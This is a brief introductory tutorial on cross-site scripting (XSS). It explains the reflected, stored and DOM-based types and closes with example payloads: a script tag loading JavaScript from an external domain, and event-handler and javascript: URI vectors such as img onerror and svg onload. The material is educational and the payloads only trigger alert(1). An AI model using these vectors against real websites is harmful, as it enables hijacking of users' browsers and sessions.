XSS 101


XSS 101

XSS 101 Bahasa Indonesia  |  English

What is XSS?

Cross-site scripting (XSS) is the most common vulnerability in web applications and allows an attacker to control the victim's browser and its interaction with a given website. XSS is carried out by the Attacker by entering the client script code into a site via URL parameters or input fields and others, website applications that have this weakness allow the Attacker to manipulate a page. This manipulation, commonly called injection, is an XSS attack.

The browser displays a page with HTML (Hypertext Markup Language) and a programming language commonly called JavaScript. JavaScript is responsible for making things run in response to actions that occur on a web/application, for example, such as loading another page, drag/drop functions on a page, or whatever web pages do quickly (without having to reload/reload). ) are the things that JavaScript does.

In an HTML document, JavaScript can run using the <script> </script> tag. If Attacker can do that tag injection (all JavaScript code can be executed if there is no filter at all) and Attacker will have full control over it.

JavaScript can also appear in HTML elements, plain tags. With built-in event handlers, such as "onload" (when a page element is loaded by the browser) or "onmouseover" (when the mouse pointer is over something), JavaScript code can also be executed. This increases the number of vectors for XSS attacks.

XSS Type

XSS bisa terjadi dikarenakan kode (response) dari server atau dari sisi client karena request yang diminta oleh browser.

  • Reflected or non-persistent
  • Stored or persistent

Reflected XSS Attacks

Reflected XSS is the most common type of XSS and the most commonly found, Reflected XSS occurs because every request from a url (such as a parameter) is returned by the server without any filter.

Stored XSS Attacks

Stored XSS is an attack where the payloads used are stored permanently on the target server, such as in databases, in message forums, visitor logs, comment fields, etc.
Apart from Stored and Reflected XSS, there is another type of XSS, namely DOM Based XSS which is identified by: Amit Klein in 2005.

Basic Example of XSS

1. With <script> tag

<script src=//HOST/SCRIPT></script>
With HOST being the attacker's domain or IP address and SCRIPT being a script with alert(1) as content, such as:
<script src=//n45ht.or.id/xss.js></script>
2. With plain HTML Tags
- Event-based
<TAG EVENT=alert(1)>
<body onload=alert(1)>
<img src=1 onerror=alert(1)>
<svg onload=alert(1)>
<x onmouseover=alert(1)>
- Resource-based
<TAG RESOURCE=javascript:alert(1)>
<iframe src=javascript:alert(1)>
<object data=javascript:alert(1)>


Related Post: